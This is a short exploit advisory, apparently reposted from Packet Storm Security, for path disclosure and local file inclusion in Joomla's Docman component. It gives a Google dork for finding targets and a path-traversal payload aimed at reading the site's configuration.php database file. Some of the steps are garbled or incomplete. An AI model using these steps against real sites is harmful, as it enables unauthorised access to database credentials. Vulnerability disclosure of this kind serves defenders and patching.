Joomla Docman Path Disclosure / Local File Inclusion

Posted on Posted in Exploit

Joomla Docman suffers from full path disclosure and local file inclusion vulnerabilities.

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact:
# Date: 13/07/2015
# Vendor Homepage:
# Google Dork: inurl:"/components/com_docman/dl2.php"

# Xploit (FPD): 
 Get one target and just download with blank parameter:
 In title will occur Full Path Disclosure of server.
# Xploit (LFD/LFI):[LDF]
 Let's Xploit...
 First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
 ../../../../../../../target/www/configuration.php <= Not Ready  <= Ready !

And Now we have a configuration file...

Quelle: Packet storm Security